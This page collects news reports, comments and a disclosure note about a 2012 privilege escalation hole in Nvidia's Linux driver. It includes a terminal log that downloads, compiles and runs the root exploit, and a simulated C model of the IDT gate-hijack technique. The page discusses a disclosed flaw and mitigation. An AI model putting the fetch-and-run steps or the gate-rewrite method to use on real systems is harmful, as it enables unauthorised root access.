Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole
Posted by Anonymous on Wed 1st Aug 2012 23:55

Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

Posted by Unknown Lamer on Wednesday August 01, @01:31PM

http://linux.slashdot.org/story/12/08/01/1618225/proprietary-nvidia-linux-driver-contains-privilege-escalation-hole

"The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public."[1] The one releasing the exploit (relayed to him anonymously) is Dave Airlie[2], well-known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

[1] http://permalink.gmane.org/gmane.comp.security.full-disclosure/86747
[2] http://airlied.livejournal.com/

############################################

"With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it." - http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845025

############################################

"Nvidia are just serial fuckups. Wasted half my Saturday trying to find a driver release that would work on my wife's Kubuntu 11 PC. Eventually gave in and upgraded to 12.04 instead of manually erasing the broken install yet again... to find another fscking broken driver and no X. These idiots are completely incompetent and simply don't respond to error reports or much of anything else from ordinary users.

Nvidia, still haven't forgotten all the accelerated functions in your chipsets that gradually got turned off as drivers updated, because the hardware was rotten to the core and couldn't be made to work. Or the ongoing multi-year saga of begging for working PAL TV support, all of it falling on deaf ears. Or the magically vanished TV out support when Vista shipped.

Frankly a root exploit is one of their lesser sins."
- http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845215

############################################

It's certainly legit..

c@v:~$
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$ ./nvid-root
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#

sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise

sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#

- http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845239

############################################

The graphics driver is both monstrously large and operates at a very low level; there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmack put it: I agree with Microsoft’s assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.
- http://linux.slashdot.org/comments.pl?sid=3019869&cid=40845991

############################################

Linus Torvalds To Nvidia - "Fuck You"
https://www.youtube.com/watch?v=_36yNWw_07g

In a talk held at Aalto University in Helsinki, Finland, Linus Torvalds addressed a question from one of the audience members regarding issues they had with a laptop running NVIDIA Optimus graphics and the lack of support for Linux.

############################################

Privilege escalation security hole found in Nvidia Linux driver

Summary: A new security hole has been discovered in Nvidia's Linux driver. Nvidia has allegedly known about the vulnerability for more than a month but has yet to fix it.

By Emil Protalinski for Zero Day | August 1, 2012

http://www.zdnet.com/privilege-escalation-security-hole-found-in-nvidia-linux-driver-7000001986/

An anonymous hacker has found a security hole in the Nvidia binary. He or she allegedly reported it to Nvidia "over a month ago" and did not receive a reply, nor was the flaw ever patched. The exploit has now been made public.

Software Engineer Dave Airlie was sent details of the vulnerability. After testing it out and discovering that it indeed works, he posted the exploit for everyone to see over at the mailing list full-disclosure@lists.grok.org.uk.

The flaw essentially allows an attacker to write to any part of memory on the system by shifting the VGA window after attaining superuser privileges. For reference, here's the full text of Airlie's disclosure:

    First up I didn't write this but I have executed it and it did work here,

    I was given this anonymously, it has been sent to nvidia over a month ago with no reply or advisory and the original author wishes to remain anonymous but would like to have the exploit published at this time, so I said I'd post it for them.

    It basically abuses the fact that the /dev/nvidia0 device accepts changes to the VGA window and moves the window around until it can read/write to somewhere useful in physical RAM, then it just does a priv escalation by writing directly to kernel memory.

    Dave.

I have contacted Nvidia about this security hole. I have also contacted Airlie for any more information he may be willing to provide. I will update you if and when I hear back.

http://airlied.livejournal.com/
http://permalink.gmane.org/gmane.comp.security.full-disclosure/86747

############################################

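The mechanism described in the Slashdot summary and in Airlie's note (a device node that lets an unprivileged process relocate the VGA window over arbitrary physical RAM, then a write straight into kernel memory), as an added example that is not code from the page, from the published exploit or from the driver: a C model of a relocatable 64 KiB aperture over a simulated physical address space. It takes the IDT address the exploit printed (0xc1808000) and the 32-bit x86 Linux direct-map base (0xc0000000) to compute where entry 220 sits in physical RAM, then rewrites that gate the way the log lines "Using IDT entry: 220", "Enhancing gate entry" and "Triggering payload" suggest: a gate that still uses the kernel code selector but carries DPL 3 and points at attacker-chosen code, so a user-mode int instruction lands in ring 0. The simulated RAM size, the window granularity, the fake IDT contents, the payload address and the driver calls that would really move the window are assumptions of the model, not facts from the page.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulation parameters. Assumptions for the model, not values taken from the
 * NVIDIA driver or from the published exploit. */
#define PHYS_MEM_SIZE  (32u * 1024u * 1024u)  /* 32 MiB of simulated physical RAM */
#define WINDOW_SIZE    (64u * 1024u)          /* legacy VGA aperture: 64 KiB */
#define WINDOW_ALIGN   (64u * 1024u)          /* assume the base moves in 64 KiB steps */
#define PAGE_OFFSET    0xc0000000u            /* 32-bit x86 Linux direct-map base */

static uint8_t  phys_mem[PHYS_MEM_SIZE];      /* stands in for physical RAM */
static uint32_t window_base;                  /* physical address the aperture shows */

/* Kernel direct-map virtual address -> physical address on 32-bit x86 Linux. */
static uint32_t virt_to_phys(uint32_t vaddr) { return vaddr - PAGE_OFFSET; }

/* Each IDT entry is an 8-byte gate descriptor. */
static uint32_t idt_entry_vaddr(uint32_t idt_base, unsigned vector) { return idt_base + vector * 8u; }

/* "Shift the VGA window": aim the aperture at the 64 KiB region holding phys. */
static bool window_select(uint32_t phys)
{
    if (phys >= PHYS_MEM_SIZE)
        return false;
    window_base = phys & ~(WINDOW_ALIGN - 1u);
    return true;
}

/* All accesses go through the aperture and must lie entirely inside it. */
static bool window_in_range(uint32_t phys, size_t len)
{
    return phys >= window_base && phys + len <= window_base + WINDOW_SIZE
        && phys + len <= PHYS_MEM_SIZE;
}

static bool window_read(uint32_t phys, void *out, size_t len)
{
    if (!window_in_range(phys, len))
        return false;
    memcpy(out, phys_mem + phys, len);
    return true;
}

static bool window_write(uint32_t phys, const void *in, size_t len)
{
    if (!window_in_range(phys, len))
        return false;
    memcpy(phys_mem + phys, in, len);
    return true;
}

/* 32-bit IDT gate descriptor (Intel SDM vol. 3, interrupt gate layout). */
struct idt_gate {
    uint16_t offset_lo;
    uint16_t selector;    /* code segment the handler runs in */
    uint8_t  zero;
    uint8_t  type_attr;   /* P | DPL<<5 | 0 | type; 0xE = 32-bit interrupt gate */
    uint16_t offset_hi;
} __attribute__((packed));

static struct idt_gate make_gate(uint32_t handler, uint16_t selector, unsigned dpl)
{
    struct idt_gate g;
    g.offset_lo = (uint16_t)(handler & 0xffffu);
    g.selector  = selector;
    g.zero      = 0;
    g.type_attr = (uint8_t)(0x80u | ((dpl & 3u) << 5) | 0x0Eu);
    g.offset_hi = (uint16_t)(handler >> 16);
    return g;
}

static unsigned gate_dpl(const struct idt_gate *g)    { return (g->type_attr >> 5) & 3u; }
static uint32_t gate_offset(const struct idt_gate *g) { return ((uint32_t)g->offset_hi << 16) | g->offset_lo; }

/* Seed the simulated RAM with a kernel-looking IDT: 256 ring-0 gates into (fake) kernel text. */
static void seed_fake_idt(uint32_t idt_phys, uint16_t kernel_cs)
{
    for (unsigned v = 0; v < 256; v++) {
        struct idt_gate g = make_gate(PAGE_OFFSET + 0x100000u + v * 0x10u, kernel_cs, 0);
        memcpy(phys_mem + idt_phys + v * 8u, &g, sizeof g);
    }
}

/* The step the log calls "Enhancing gate entry": put the window over the IDT and
 * rewrite one gate so it keeps the kernel code selector (handler runs in ring 0)
 * but gets DPL 3 (a user-mode "int N" may invoke it) and the attacker's address. */
static bool hijack_vector(uint32_t idt_vaddr, unsigned vector, uint32_t payload,
                          uint16_t kernel_cs, struct idt_gate *out)
{
    uint32_t phys = virt_to_phys(idt_entry_vaddr(idt_vaddr, vector));
    if (!window_select(phys))
        return false;
    struct idt_gate g = make_gate(payload, kernel_cs, 3);
    if (!window_write(phys, &g, sizeof g))
        return false;
    return window_read(phys, out, sizeof *out);
}

int main(void)
{
    const uint32_t idt_vaddr = 0xc1808000u;   /* "IDT offset" printed by the exploit on the page */
    const uint16_t kernel_cs = 0x60;          /* __KERNEL_CS on 32-bit Linux */
    const uint32_t payload   = 0x08048000u;   /* hypothetical user-space address */
    struct idt_gate g;

    seed_fake_idt(virt_to_phys(idt_vaddr), kernel_cs);
    if (!hijack_vector(idt_vaddr, 220, payload, kernel_cs, &g)) {
        puts("IDT not reachable through the window");
        return 1;
    }
    printf("window base 0x%08x, entry 220 at phys 0x%08x\n",
           window_base, virt_to_phys(idt_entry_vaddr(idt_vaddr, 220)));
    printf("gate now: offset 0x%08x selector 0x%02x dpl %u\n",
           gate_offset(&g), g.selector, gate_dpl(&g));
    return 0;
}
```

Two details carry the whole technique. The IDT base is readable from user mode with sidt, and on a 32-bit kernel the direct-map arithmetic (virtual minus 0xc0000000) turns it into the physical address the window has to cover; 0xc1808000 + 220 * 8 is exactly the 0xc18086e0 the log shows. DPL 3 on the gate is what makes "Triggering payload" legal: the CPU only lets a software interrupt from ring 3 through a gate whose DPL is at least the caller's privilege level, while the kernel code selector in the same gate makes the handler execute in ring 0. The only capability the attacker needs is open() on /dev/nvidia0, which a typical desktop install creates world read/write; until a fixed driver is installed, the practical interim measure is to restrict that node to a trusted group, accepting that users outside it lose GPU access.

############################################
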
eof